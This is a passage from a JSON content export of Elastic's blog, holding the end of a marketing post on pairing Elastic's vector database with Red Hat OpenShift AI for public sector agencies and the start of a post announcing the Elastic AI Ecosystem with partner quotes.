12pt;'\u003e Elastic’s security features include role-based access control, encryption, and auditing capabilities. These controls ensure data integrity and compliance with government security standards, making Elastic suitable for handling sensitive information across the public sector.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Red Hat OpenShift AI: A containerized platform for AI and machine learning","_metadata":{"uid":"cs2da36ebf8f9b6627"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOpenShift AI by Red Hat is a containerized platform designed to support the development, deployment, and scaling of AI and ML applications. It provides agencies with a flexible, on-premises or cloud-agnostic solution that integrates seamlessly with Elastic’s data management capabilities.\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eContainerization for flexibility and scalability:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Red Hat OpenShift AI allows organizations to containerize their AI workloads, giving teams the flexibility to deploy applications across various environments. This adaptability is essential for agencies that need to manage their applications in secure, distributed settings.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eData and model lifecycle management:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Red Hat OpenShift AI facilitates end-to-end model management — from data ingestion and preparation to model training, deployment, and monitoring. This accelerates the AI development lifecycle, enabling public sector organizations to respond rapidly to new requirements and operational needs.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eInteroperability and open standards: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eRed Hat OpenShift AI’s support for open standards means that it can integrate seamlessly with various data sources and other AI tools, making it ideal for agencies using Elastic for data management and storage.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Integrating Elastic and OpenShift AI: A powerful approach for public sector AI and ML","_metadata":{"uid":"cs43582b5ad146e483"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eCombining Elastic as a vector database with Red Hat OpenShift AI provides public sector agencies with a unified solution for managing data and deploying AI models.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eKey integration benefits:\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003col\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eImproved search and retrieval for unstructured data:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Elastic’s vector database enables high-performance similarity searches, allowing Red Hat OpenShift AI to use this data for ML models. This is critical for tasks, such as natural language processing (NLP), image recognition, and anomaly detection.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eEnd-to-end data and model security:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Both Elastic and Red Hat OpenShift AI are designed to meet strict security standards, offering agencies end-to-end security. Elastic secures the data while Red Hat OpenShift AI manages model security during training and deployment.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eEnhanced speed and efficiency for AI projects:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e With Elastic’s real-time data indexing and Red Hat OpenShift AI’s rapid model deployment capabilities, agencies can accelerate their AI initiatives — moving from data ingestion to actionable insights faster.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eFlexible AI and ML deployment options:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Red Hat OpenShift AI’s containerized approach allows for on-premises, cloud, or hybrid deployment options, giving agencies the flexibility to deploy AI solutions wherever they are needed while adhering to security and compliance standards.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e"},{"title_l10n":"Use cases: AI and ML in action for the public sector","_metadata":{"uid":"csc33bf7d49cf2de78"},"header_style":"H2","paragraph_l10n":"\u003col\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003ePredictive maintenance for public infrastructure:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e By using sensor data stored in Elastic, agencies can train ML models in Red Hat OpenShift AI to predict maintenance needs for critical infrastructure — minimizing downtime and improving service reliability.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eEnhanced threat detection:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Elastic’s vector database enables high-speed processing of large data sets, such as cybersecurity logs. Red Hat OpenShift AI can use this data to train threat detection models, empowering security operations teams to identify and mitigate threats in real time.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eFraud detection and risk assessment:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Combining Elastic's vector search with Red Hat OpenShift AI’s ML capabilities enables agencies to detect fraud patterns in real time, helping to reduce financial losses and ensure program integrity.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eCitizen services and experience enhancement:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e AI-driven applications developed on Red Hat OpenShift AI using Elastic’s data insights can deliver personalized, responsive services to citizens, enhancing their interactions with public sector organizations.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e"},{"title_l10n":"A powerful integration for public sector","_metadata":{"uid":"csa0f49ab028f675e7"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThe integration of Elastic as a vector database with Red Hat OpenShift AI represents a powerful combination for the public sector. By using Elastic’s search and retrieval capabilities alongside Red Hat OpenShift AI’s flexible and scalable ML platform, public sector organizations can transform their approach to data management and AI development. Together, these platforms provide a secure, flexible, and scalable environment that supports a wide range of AI and ML applications — from threat detection to predictive maintenance and citizen engagement.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eFor public sector agencies looking to accelerate AI and ML adoption, \u003c/span\u003e\u003ca href=\"https://developers.redhat.com/learn/openshift-ai/demystify-rag-openshift-ai-and-elasticsearch\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic and Red Hat OpenShift AI\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e provide the robust, reliable infrastructure needed to drive mission success and meet the evolving demands of modern government.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 11pt;\"\u003e\u003cstrong\u003eAbout Elastic and Red Hat OpenShift AI\u003c/strong\u003e\u003cstrong \u003e\u003cbr bold=\"[object Object]\"/\u003e\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 11pt;\"\u003e\u003cem\u003eElastic is a leading platform for search-powered solutions, enabling public sector organizations to gain real-time insights from structured and unstructured data. Red Hat’s OpenShift AI platform provides a secure, scalable container platform tailored to meet the demands of AI and ML applications.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csdb4869ab5cc4cf9a"}}},{"callout":{"title_l10n":"Related resources:","_metadata":{"uid":"cs884ea25ca138eb2f"},"paragraph_l10n":"\u003cul\u003e\u003cli\u003e\u003ca href=\"https://www.elastic.co/search-labs/tutorials\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElasticsearch Labs\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.redhat.com/en/solutions/ai\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eRedHat Openshift AI\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003c/ul\u003e","callout_reference":[],"callout_type":"Information (info)"}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csddaf6db835899267"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs5224e322fc386d32"}}}],"publish_date":"2024-11-15","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[{"_version":2,"locale":"en-us","uid":"blt62646ad19dd7b0b8","ACL":{},"created_at":"2020-06-17T03:23:52.847Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"government","label_l10n":"Government","tags":[],"title":"Government","updated_at":"2020-07-06T22:17:42.931Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.550Z","user":"blt4b2e1169881270a8"}}],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}},{"title":"Machine learning","label_l10n":"Machine learning","keyword":"machine-learning","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt65b9df038275be61","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:38:34.860Z","updated_at":"2020-06-17T03:38:46.799Z","_content_type_uid":"tags_topic","ACL":{},"_version":2,"_workflow":{"uid":"blte3b720fd9661d254","updated_at":"2020-06-17T03:38:34.860Z","updated_by":"blt3044324473ef223b70bc674c","version":1},"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-07-01T17:16:32.546Z","user":"blt3044324473ef223b70bc674c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt0e7c39f65cbd3755","ACL":{},"created_at":"2023-11-06T20:37:20.943Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"data-ingestion","label_l10n":"Data ingestion","tags":[],"title":"Data ingestion","updated_at":"2023-11-06T20:37:20.943Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.173Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt284682f193d93481","ACL":{},"created_at":"2023-11-06T20:07:36.694Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"ai-ml-models","label_l10n":"AI/ML models","tags":[],"title":"AI/ML models","updated_at":"2023-11-06T20:07:36.694Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:41:37.071Z","user":"blt06083bb707628f5c"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"bltdeb5e512cabf0e10","ACL":{},"created_at":"2023-11-03T17:34:50.549Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"platform","label_l10n":"Platform","tags":[],"title":"Platform","updated_at":"2023-11-03T17:34:53.443Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.235Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt569b48df66a9ba5d","ACL":{},"created_at":"2020-06-17T03:30:49.259Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security","label_l10n":"Security","tags":[],"title":"Security","updated_at":"2020-07-06T22:20:03.211Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.430Z","user":"blt4b2e1169881270a8"}},{"_version":3,"locale":"en-us","uid":"blt10eb11313dc454f1","ACL":{},"created_at":"2020-06-17T03:30:26.497Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"enterprise-search","label_l10n":"Search","tags":[],"title":"Search","updated_at":"2023-07-19T16:04:51.718Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.232Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"bltbc86a233655f4b8e","ACL":{},"created_at":"2022-09-13T16:43:08.111Z","created_by":"blt36e890d06c5ec32c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2022-09-13T16:43:08.111Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.253Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"bltd5decf0333b008f5","_version":1,"is_dir":false,"ACL":{},"content_type":"image/jpeg","created_at":"2024-11-14T18:22:55.459Z","created_by":"bltb6c155cd84fc0c1a","file_size":"147969","filename":"158175_-_Blog_header_image_2.jpg","parent_uid":null,"tags":[],"title":"158175 - Blog header image_2.jpg","updated_at":"2024-11-14T18:22:55.459Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-15T14:00:02.630Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltd5decf0333b008f5/67363fff910ead264a592c5f/158175_-_Blog_header_image_2.jpg"},"title":"Elastic and Red Hat: Accelerating public sector AI and machine learning initiatives","title_l10n":"Elastic and Red Hat: Accelerating public sector AI and machine learning initiatives","updated_at":"2024-11-14T18:27:17.292Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/elastic-red-hat-public-sector-ai-machine-learning","publish_details":{"time":"2024-11-15T14:00:02.598Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blta1a2822ee938e4cd","_version":15,"locale":"en-us","ACL":{},"abstract_l10n":"The explosive growth of AI technology adds complexity in choosing production-ready tools. Elastic’s AI Ecosystem empowers developers with Elasticsearch vector database integrations and enables tech providers to accelerate innovation.","author":["blt3323f40b67886e38","blta88061c105b8011d"],"category":["blt0c9f31df4f2a7a2b"],"created_at":"2024-11-14T02:00:24.700Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cse5e3d7e87e6158ab"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eGenerative AI (GenAI) is transforming the business landscape we’ve come to know. To simplify and accelerate how developers\u0026nbsp;build and deploy their retrieval augmented generation (RAG) applications —\u0026nbsp; Elastic is proud to announce the \u003c/span\u003e\u003ca href=\"http://www.elastic.co/partners/ai-ecosystem\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic AI Ecosystem\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e — bringing together a rich set of Elasticsearch vector database integrations with industry-leading AI technology providers.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eMeet the ecosystem of integrations \u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eaccelerating AI application development — one integration at a time: Alibaba Cloud, Amazon Web Services (AWS), \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAnthropic's Claude\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, Cohere, Confluent, Dataiku, DataRobot, Galileo, Google Cloud, Hugging Face, LangChain, LlamaIndex, Mistral AI, Microsoft, NVIDIA, OpenAI, Protect AI, Red Hat, Vectorize.io, and Unstructured.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Why it matters ","_metadata":{"uid":"cs9cf7b7cdf07e8aca"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThe number of AI models, frameworks, and platforms is growing at an explosive pace — providing choices but also presenting an\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e increasingly complex challenge\u003c/strong\u003e:\u003cstrong\u003e \u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003echoosing the right AI technologies to build production-ready applications.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eElasticsearch is uniquely positioned to address this challenge as the world's most downloaded vector database.\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e The Elastic AI Ecosystem provides developers with a comprehensive set of AI technologies and tools with Elasticsearch vector database integrations. These integrations empower enterprises to speed up their time to market and capitalize on new opportunities through collective innovation.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs12a0fd79639aa10f"}}},{"quotes":{"quote_l10n":"The enterprise AI market is evolving at an accelerating rate with new products and services arriving daily. While this dizzying array of options expands the portfolio of capabilities available to enterprises and their developers, it can simultaneously slow them down by increasing the number of choices and integrations that need to be made. One way to balance the need for new capabilities with a streamlined developer experience is by thoughtfully curating and integrating tools to maximize their collective capabilities. This is what Elastic designed its AI Ecosystem to do.","_metadata":{"uid":"csad246179ef6b31ed"},"quote_author_l10n":"Stephen O’Grady, Principal Analyst, RedMonk","quote_details_l10n":""}},{"title_text":{"title_text":[{"title_l10n":"Elasticsearch vector database: GenAI essentials","_metadata":{"uid":"csfb3afc3942a5aaa4"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe foundation of generative AI is data — and the Elastic Search AI Platform is where private enterprise data meets AI. Elasticsearch’s vector database efficiently creates, stores, and searches vector embeddings at scale. In addition, we offer multiple types of retrieval — text, sparse and dense vector, and hybrid — that allow developers to choose suitable AI models with Elasticsearch Open Inference API. We’re integrating with AI technology providers that are focused on:\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAI models\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eData prep and ingestion platforms\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAI models evaluation and experimentation\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eGenAI development frameworks\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eMachine learning operations (MLOps) capabilities\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAI security\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eCloud infrastructure of choice\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"cs1fd9e102aaff8678"}}},{"video":{"vidyard_uuid":"s1tXP6UGEXrYr4rprE9Xxr","_metadata":{"uid":"cse7bd417813b6c678"},"caption_l10n":"","shadow":false,"video_play_count":"","muted":false,"loop_video":true,"hide_controls":false,"looping_animation":true}},{"callout":{"title_l10n":"Your AI toolbox","_metadata":{"uid":"cs4516c19551bc53bf"},"paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eExplore our growing benefits for the Elastic AI Ecosystem and join the active \u003c/span\u003e\u003ca href=\"https://www.elastic.co/community\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003etechnical expert community\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong \u003e\u003cbr bold=\"[object Object]\"/\u003e\u003c/strong\u003e\u003cstrong\u003eDevelopers — dive into your benefits:\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003eDevelopment resources on \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eSearch Labs\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, including quickstart guides and code examples in multiple languages, performance optimization guidance, security and privacy frameworks, \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/rag-playground-introduction\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eRAG \u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003eapplication experimentations, and more\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAccess to \u003c/span\u003e\u003ca href=\"https://www.elastic.co/demo-gallery/ai-playground\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAI Playground\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e for testing capabilities and integrations\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"https://www.meetup.com/pro/elastic/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eGlobal DevRel Meetup\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e participation\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e\u003cbr /\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eEnterprise customers — access \u003c/strong\u003e\u003c/span\u003e\u003ca href=\"https://www.elastic.co/consulting\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003etechnical consulting services\u003c/strong\u003e\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e for:\u0026nbsp;\u003c/strong\u003e\u003c/span\u003e\u003cul\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAccelerated ROI through sales support with GenAI experts\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003eMaturity analysis and application strategy planning\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e\u003cbr /\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eAre you interested in joining The Search AI Partner Program? \u003c/strong\u003e\u003c/span\u003e\u003ca href=\"https://partners.elastic.co/English/register_email.aspx\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eApply\u003c/strong\u003e\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e to join and secure access to:\u003c/strong\u003e\u003c/span\u003e\u003cul\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003eIndustry insights: Access early previews of Elastic's roadmap and features.\u0026nbsp;\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003ePartner community: Join the team at \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003epartner advisory councils and summits and gain support in expanding \u003c/span\u003e\u003cspan style=\"color: rgb(52, 55, 65);font-size: 12pt;\"\u003eopportunities.\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic Partner Academy: Level up with advanced Elastic certifications, sales, and technical AI training.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e","callout_reference":[],"callout_type":"Information (info)"}},{"title_text":{"title_text":[{"title_l10n":"What the Elastic AI Ecosystem is saying ","_metadata":{"uid":"csd2ec33c421b086ce"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"color: rgb(34, 34, 34);font-size: 12pt;\"\u003e\u003cem\u003e“AI is only as effective as the data powering it. Without real-time, fresh data sets, even the most advanced AI applications will struggle to deliver accurate, relevant insights,” \u003c/em\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(34, 34, 34);font-size: 12pt;\"\u003e\u003cem\u003e\u003cstrong\u003esaid Paul Mac Farland, SVP of partner and innovation ecosystem at \u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003cem\u003e\u003c/em\u003e\u003ca href=\"https://www.confluent.io/generative-ai/\" target=\"_blank\"\u003e\u003cem\u003e\u003c/em\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003e\u003cstrong\u003e\u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003cem\u003eConfluent\u003c/em\u003e\u003c/a\u003e\u003cem\u003e\u003c/em\u003e\u003cspan style=\"color: rgb(34, 34, 34);font-size: 12pt;\"\u003e\u003cem\u003e.“Seamlessly integrated with Elastic, Confluent’s fully managed data streaming platform — with unified Apache Kafka\u003c/em\u003e\u003c/span\u003e\u003cspan style=\"font-size: 0.6em;\"\u003e\u003csup\u003e®\u003c/sup\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(34, 34, 34);font-size: 12pt;\"\u003e\u003cem\u003e and Apache Flink\u003c/em\u003e\u003c/span\u003e\u003cspan style=\"font-size: 0.6em;\"\u003e\u003csup\u003e® \u003c/sup\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(34, 34, 34);font-size: 12pt;\"\u003e\u003cem\u003e— allows businesses to build the real-time, always up-to-date data foundation that highly contextualized, production-ready search AI applications require.”\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003e“We have partnered with Elastic to empower developers to build trust in their GenAI applications by leveraging Elasticsearch vector database and Galileo's Evaluation Intelligence Platform,” \u003c/em\u003e\u003cem\u003e\u003cstrong\u003esaid Vikram Chatterji, CEO and co-founder at Galileo\u003c/strong\u003e\u003c/em\u003e.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"color: rgb(34, 34, 34);font-size: 12pt;\"\u003e\u003cem\u003e“Combining Hugging Face’s Inference Endpoints with Elastic’s retrieval relevance tools helps users gain better insights and improve search functionality,” \u003c/em\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(34, 34, 34);font-size: 12pt;\"\u003e\u003cem\u003e\u003cstrong\u003esaid Jeff Boudier, head of product at Hugging Face\u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(34, 34, 34);font-size: 12pt;\"\u003e.\u003c/span\u003e\u003cspan style=\"color: rgb(34, 34, 34);font-size: 12pt;\"\u003e\u003cem\u003e\u003cstrong\u003e \u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(34, 34, 34);font-size: 12pt;\"\u003e\u003cem\u003e“With this integration, developers get a complete solution to leverage the best open models, hosted on Hugging Face multicloud GPU infrastructure, to build semantic search experiences in Elasticsearch.”\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003e“Our partnership with Elastic helps developers build GenAI applications faster and more effectively. Leveraging LangGraph alongside Elasticsearch’s vector database, developers can create high-impact agentic applications that streamline the path 